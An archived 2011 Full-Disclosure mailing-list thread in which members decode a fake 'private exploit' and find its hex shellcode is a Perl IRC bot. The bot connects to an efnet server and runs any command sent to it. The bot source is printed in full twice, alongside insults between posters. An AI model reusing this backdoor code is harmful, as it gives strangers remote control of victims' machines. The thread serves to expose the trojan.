Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-27 Thread rancor 
#!/usr/bin/perl$chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron
+i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK
$nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print
$sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print
$sock RIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi
2/dev/null;/tmp/hi

2011/10/27 Joshua Thomas rappercra...@gmail.com:
 Use this link to decode the shellcode ...
 --- http://www.dolcevie.com/js/converter.html

 This executes the perl code on the local machine  :D




 On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Andrew Farmer 
On 2011-10-25, at 19:15, adam wrote:
 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread,
 code is mentioned though)
 
 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a 
while. ;)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Flavio do Carmo Junior 
'system(h3llcode)' ??

Should be fun...

On 10/26/11, xD 0x41 sec...@gmail.com wrote:
 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose it,
 and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


-- 
Sent from my mobile device

--
Best regards,

Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Flavio do Carmo Junior 
sounds really useful...

[waKKu@1215n ~]$ python -c 'hellcode=(
\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63
 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69
 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72
 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e
 \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65
 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f
 \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49
 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e
 \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22
 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63
 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d
 \x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43
 \x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68
 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20
 \x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64
 \x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65
 \x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d
 \x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d
 \x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20
 \x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c
 \x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22
 \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53
 \x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20
 \x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66
 \x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20
 \x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20
 \x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f
 \x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63
 \x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68
 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f
 \x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
 \x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e
 \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28
 \x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24
 \x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d
 \x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24
 \x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24
 \x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22
 \x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22
 \x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c
 \x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d
 \x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64
 \x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69); print 
 hellcode;'
#!/usr/bin/perl
$chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron
+i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK
$nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print
$sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print
$sock PRIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi
2/dev/null;/tmp/hi
[waKKu@1215n ~]$

print hellcode[764:];'
/tmp/hi


--

On 26 October 2011 13:49, xD 0x41 sec...@gmail.com wrote:
 yer ofc... anyhow, ignoring you now...

 you obv think your some leet troll, your not, your ONLY a TROLL :)
 have a nice day or is that

 *Goplamamamama Ignananayu*

 forget the jedi oky, you gotta brushup on ya troll trash talk!
 bah hahaha.
 fool
 xd


 On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burger can be dangerous pandawan.
 More over if you work at burger king.



 On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is
 a good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread GloW - XD 
Ok... am awake now and, have some infos yes...
Interesting bot.
Seems i have spoken with some people regarding this and the release.Here is
a brief outline of how it goes.
Attacks were done on some people who run shells on efnet irc network, so in
order to catch the *morons8 or, ppl who did launch the DoS
would then be showing up in #darknet channel, and responds to the ops or,
channel.
I ran this and saw it still clobbers smb,and still uses the original bug, so
d0s will still occur,
however, it will try and join, i believe thats a dead link in there now but,
would have tried to join a efnet node..
Speaking with #darknet owners:

 ok dude why was this released...
msg we released the original working code. this started a massive war of
the kids,
unfortunately many innocent boxes got raped, so we decided to play a small
game, and make a *version plus*
or so so say.
 very interesting concept, new, intuitive to use perl, as many people would
decrypt it tho, using perl -e , isnt this alittle harsh...
msg they run it, it wont affect them, atall, they will see the connection
and kill it,and since no D0s is launched, it wont really work
 hrmm well, it is a good idea, to capture the arseholes who wish to ddos
etc... i see why it is done but also, can i ask you
  do you know what a darknet is ? because, you seem to not see that, ppl
would assume this channel is all about 'darknets'..
 instead it is only capturing people who will launch a DoS tool,and many
people seem 'idle'.
msg we dont control who comes here, now care, but when it comes to d0s, we
dont scrw about.hit us,and we will hit back.
Also, why are you asking me about code wich was made in 2003 or so :P~
 ahh well, thats purely because, i expose any BS like this code is, but, i
will not mark this as bullshit.
  it is horseshit :P and, i respect that your at the least, using some
shitty tool like d0s, instead of faking an exploit.
  I will class this not as exposed atall, instead, it will serve as some
form of tuition to skids.
  Run the tools you cannot read, and, expect even some shitty perlbot to pop
out. I like it!
  I will class this as exposed but intuitive, thankyou for your time.
msg i dont care what you mark it as, the rule is simple, do not run d0s
./appz ! Have a nice day!
 Again thanks for your time, i will keep the nickname anonymous... your not
classed as a now-owner , so i guess it is more wtf this was all about, even
when you wrote the .c or, as i know it,
   was 'brain' or some dude... either way, i tip the black hat to you but
also warn you not always will them kids be happy to be owned by shitty .c ,
so, id be expecting more problems from release, than not
   This is your problem, and, i respect your views, just get some knowledge
into you about wtf a 'darknet' is prompto!
   Also have a nice day.

..
Ok so, basically the talk i had with a now non op of channel but,
interesting coz, it is actually very popular, yet only a few actually
realise that theyre being linked now to a darknet technology app etc, and
theyre finding that maybe they should have kept those old ops :P or maybe
they could just release 'ipv6killer.c' and just fix some
settings..eitherway, it is kinda unique, and strange why there was no chat
about this app, until now.. nothing
solid wich shows this perl, and admittedly, thats a VERY clever bot for such
a small piece of code.
Anyhow, thanks to those who found this interesting, sorry to those who didnt
:)
I think i might hang in darknet channel and wait for a few Hi im a lamer!
etc... rofl.
cheers, and cheers to #darknet for atleast not faking the tool completely,
and, using a skeleton and structure of theyre OWN code.
Winnuke2000.c is NOT backdoored, and IS theyres also, I think they regret
releasing it now but, this was 2003, and, as i said, i will try and expose
anything i find strange, however, from now on, ill be marking exposes under
noise, as theyre non disclosures.
xd




On 26 October 2011 16:55, Flavio do Carmo Junior carmo.fla...@gmail.comwrote:

 sounds really useful...

 [waKKu@1215n ~]$ python -c 'hellcode=(
 \x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63
 
 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69
 
 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72
 
 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e
 
 \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65
 
 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f
 
 \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49
 
 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e
 
 \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22
 
 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63
 
 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Antony widmal 
You think no one saw your trolls coming ?

Time to grow the fuck up fat ass.


On Tue, Oct 25, 2011 at 10:49 PM, xD 0x41 sec...@gmail.com wrote:

 yer ofc... anyhow, ignoring you now...

 you obv think your some leet troll, your not, your ONLY a TROLL :)
 have a nice day or is that

 *Goplamamamama Ignananayu*

 forget the jedi oky, you gotta brushup on ya troll trash talk!
 bah hahaha.
 fool
 xd



 On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burger can be dangerous pandawan.

 More over if you work at burger king.



 On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is
 a good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?
 Is it good ?
 hehe... maybe it is!
 i guess if hes using it...well...
 *sic*




 On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical
 code, claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked
 private exploit on pastebin a few weeks back (you know, the one that 
 was
 nice enough to create a _local_ root account), and insisted that it was
 private private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many
 boxes yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some
 opinion, other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a
 look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill
 know abit more..
 altho , i rmember this thing, and, somany people were after it,
 people were paying for it, this is first time i have seen it actually
 disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can
 expose it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Joshua Thomas 
Use this link to decode the shellcode ...
--- http://www.dolcevie.com/js/converter.html

This executes the perl code on the local machine  :D




On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
Hello List,
Id like people to also, like this thread asks, to pls give some opinion,
other than mine.. wich, i am yet to make;

http://www.hackerthreads.org/Topic-5973

Please look at this .c code on here, if you wish, and tell me, why
A. It is still in circulation, seeminlgly, on MANY MANY boxes
B. people still seem to try keep it private :s

This morning, a friend from webhostingtalk.com ,asked me to take a look.
I have and, i can only sofar say, once i decrypt the shellcode, ill  know
abit more..
altho , i rmember this thing, and, somany people were after it, people were
paying for it, this is first time i have seen it actually disclosed tho,
admittedly only looked today.
If skiddies are using it to ddos things, I want to makesure i can expose it,
and kill the threats.
thankyou.
xd .// exposing bullshit as i ride!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Mike Hale 
Exploits this, maybe?

http://www.us-cert.gov/cas/bulletins/SB05-040.html#smb

On Tue, Oct 25, 2011 at 6:50 PM, xD 0x41 sec...@gmail.com wrote:
 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose it,
 and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
Hrm, exactly what im wondering about, is that packet just 'junk' in effect
, or just hiding more :s
I will investiagte it.
It is strange tho, as nothing of the *normal* has detected anything malign
yet to me, but, i just started the OS i use for this stuff 20seconds ago,
and it has only read a few setors of the code sofar... yes, it is a home
lab, it is just IBM x3 3U racks, put together in a DIYs kinda rack,but works
for me :)
It is also a 'darknet' , so many of this kinda network shit seems to dribble
in from many places, atm it seems, this is the .c file theyre trying to
hide, apparently it can send a negotiation wich just trashes the SMB client,
according to this, wich i am going to see what does exactly in about
5minutes :P
i will keepyou informed as yes, usually most ddos wich uses *trash* code to
send as broadcasting packet, would encapsulate exactly this, BS, wich, this
is not.
It is some code in there, but, it is also not str8 forward yet for me, until
i have results but, it does spawn some strange sockets :s
I will see where it leads.
thx for that info about the SMB bugs, i do know of them but, just have seen
this done once properly on linux, wich is a really hardass attacking tool,
and clobbers smb server, but, this one seemingly does it diferently.
there is a winssmb-nuke tool already, i know that DOES work 100% now i did
alittle google b4 ending this post, and, this is the apprent descendant,
wich was sold.
I will look now and wait for my os to read thru it abit... and darknet to
see where it connects.
interesting one tho.
i have also found similar code, for something else called ipv6killer.c ,no
not ipv6fuck.c wich is also, actually real, but, ipv6killer.c, wich is
almost exactly this same code, but, actually seems setup for ipv6, so makes
me think about this one harder :s
i am stumped until i have a malware analysis from my box, as i dont run
things at first glance, specially ddos crap, that will certainly lead to mem
corruption :P
ok, cheers sofar, ill keep looking!
xd


On 26 October 2011 13:03, Flavio do Carmo Junior carmo.fla...@gmail.comwrote:

 'system(h3llcode)' ??

 Should be fun...

 On 10/26/11, xD 0x41 sec...@gmail.com wrote:
  Hello List,
  Id like people to also, like this thread asks, to pls give some opinion,
  other than mine.. wich, i am yet to make;
 
  http://www.hackerthreads.org/Topic-5973
 
  Please look at this .c code on here, if you wish, and tell me, why
  A. It is still in circulation, seeminlgly, on MANY MANY boxes
  B. people still seem to try keep it private :s
 
  This morning, a friend from webhostingtalk.com ,asked me to take a look.
  I have and, i can only sofar say, once i decrypt the shellcode, ill  know
  abit more..
  altho , i rmember this thing, and, somany people were after it, people
 were
  paying for it, this is first time i have seen it actually disclosed tho,
  admittedly only looked today.
  If skiddies are using it to ddos things, I want to makesure i can expose
 it,
  and kill the threats.
  thankyou.
  xd .// exposing bullshit as i ride!
 

 --
 Sent from my mobile device

 --
 Best regards,

 Flávio do Carmo Júnior
 Sydney/NSW
 http://au.linkedin.com/in/carmoflavio/en
 http://0xcd80.wordpress.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
I use darknets to help me,
they send me the info i need.
simple answer to simple question.
look them up, they may oneday protect you, also.


On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes yet
 know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread adam 
http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
claims to be a remote kernel root exploit)
http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
code, claims to be an IIS exploit)
http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread,
code is mentioned though)

I'm sure there's more, but this kinda reminds me of that leaked private
exploit on pastebin a few weeks back (you know, the one that was nice
enough to create a _local_ root account), and insisted that it was private
private private and specifically said NOT to leak it.

I am curious as to how you're so certain that it's on many many boxes yet
know next to nothing about it.

On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people were
 paying for it, this is first time i have seen it actually disclosed tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
Ok... i see now, it is being disguised, from along time ago...
strange why it is being used, unless people have started to rename things
maybe... to suit old things, wich dont work :s
it is possible...
I will see what it is doing and done sofar in the darknet i have setup in a
sec and, that will be it.
ok.. cheers.


On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar
 code, claims to be an IIS exploit)
